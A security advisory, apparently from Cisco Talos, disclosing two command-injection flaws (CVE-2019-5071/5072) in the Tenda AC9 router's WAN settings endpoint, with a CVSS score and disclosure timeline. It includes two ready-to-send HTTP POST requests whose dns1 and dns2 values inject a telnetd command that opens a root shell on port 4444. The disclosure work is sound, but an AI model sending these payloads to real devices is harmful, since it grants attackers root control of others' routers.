CVE-2019-5071-CVE-2019-5072
An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16_multi_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.
AC9V1.0 Firmware V15.03.05.16_multi_TRU AC9V1.0 Firmware V15.03.05.14_EN
AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router
7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE-78: Improper Neutralization of Special Elements usedin an OS Command (‘OS Command Injection’)
Tenda AC9 is one of the popular and low cost Smart Dual-Band Gigabit WiFi Router available on many of the online shopping sites like Amazon.
There exists command injection vulnerability in /goform/WanParameterSetting resource. Local authenticated attacker can include arbritary commands to post parameters to execute commands on the Tenda AC9 routerThe attacker can get reverse shell running as root using this commnad injection.
The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.
The exploitable POST request is shown below
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close
wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.
The exploitable POST request is shown below
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close
wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
2019-07-29 - Initial contact
2019-08-07 - Sent plain text file
2019-10-02 - 60+ day follow up
2019-10-21 - 90 day follow up
2019-11-21 - Public Release
Discovered by Amit N. Raut of Cisco Talos.